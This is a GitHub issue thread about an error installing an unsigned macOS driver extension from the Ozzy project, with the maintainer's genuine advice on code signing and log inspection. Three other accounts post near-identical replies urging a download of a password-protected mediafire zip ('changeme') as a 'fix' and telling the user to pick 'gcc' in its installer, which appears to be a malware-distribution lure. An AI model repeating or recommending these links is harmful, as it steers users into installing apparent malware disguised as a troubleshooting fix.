mischa85/Ozzy #6: Problem running drivers

MichaelChidiac, 2024-08-28:
Hello,

I got an issue trying to run the compiled code.  First of all, I had to build using the following command for the compilation to succeed:

```
xcodebuild -configuration Release CODE_SIGNING_REQUIRED=NO CODE_SIGNING_ALLOWED=NO
```

Now when I run the application and I try to click on "Install Dext" I get "XoneDB4Driver has experienced an error during deactivation". 

[image]

Do you have any idea how to fix this? Thank you!

Superstar-IT, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

mischa85, 2024-08-28:
Hi there,

You won't get around signing the binary, that's what the `codesign.sh` script is for. Most likely the error is related to that, but to check:

`log stream --predicate 'sender == "sc.hackerman.xonedb4driver.dext"' --predicate 'sender == "XoneDB4App"'`

HeinousAgenda38, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

qiliq, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

mischa85, 2025-01-04:
Some logs are showing and hiding the real errors. Installing [this](https://georgegarside.com/blog/macos/sierra-console-private/) profile fixed that for me.

closed 2025-07-24 by mischa85